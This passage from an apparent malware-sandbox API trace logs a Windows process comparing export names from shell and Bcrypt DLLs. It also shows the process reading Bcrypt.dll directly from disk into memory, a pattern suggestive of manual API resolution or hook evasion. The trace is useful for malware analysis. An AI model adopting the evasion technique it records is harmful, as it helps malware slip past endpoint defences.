lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0188.638] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0188.639] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0188.640] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0188.640] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0188.640] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0188.640] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0188.640] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.640] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0188.640] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.640] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.640] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.641] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0188.642] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0188.643] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0188.643] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0188.643] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0188.643] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0188.643] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0188.643] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0188.643] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0188.643] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0188.643] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0188.643] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0188.644] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0188.644] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0188.644] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0188.644] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0188.846] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0188.847] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0189.096] GetProcessHeap () returned 0x590000 [0189.096] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40cb040 | out: hHeap=0x590000) returned 1 [0189.685] GetProcessHeap () returned 0x590000 [0189.685] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a92c0 [0189.685] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0189.690] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0189.690] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0189.691] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0189.691] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0189.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0189.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0189.691] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0189.692] GetProcessHeap () returned 0x590000 [0189.692] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x26fa0) returned 0x2d02010 [0189.693] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0189.693] ReadFile (in: hFile=0x15c, lpBuffer=0x2d02010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d02010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0189.697] CloseHandle (hObject=0x15c) returned 1 [0189.698] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0189.698] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0189.698] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0189.698] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0189.698] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.698] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0189.698] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0189.698] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.698] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.698] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0189.698] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0189.698] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.698] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.698] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0189.698] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0189.698] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0189.698] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.698] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.698] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0189.698] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0189.698] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0189.698] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0189.698] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0189.699] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0189.699] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0189.699] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0189.699] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.699] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.699] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0189.699] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0189.699] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0189.699] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0189.699] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0189.699] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0189.699] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0189.700] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0189.700] 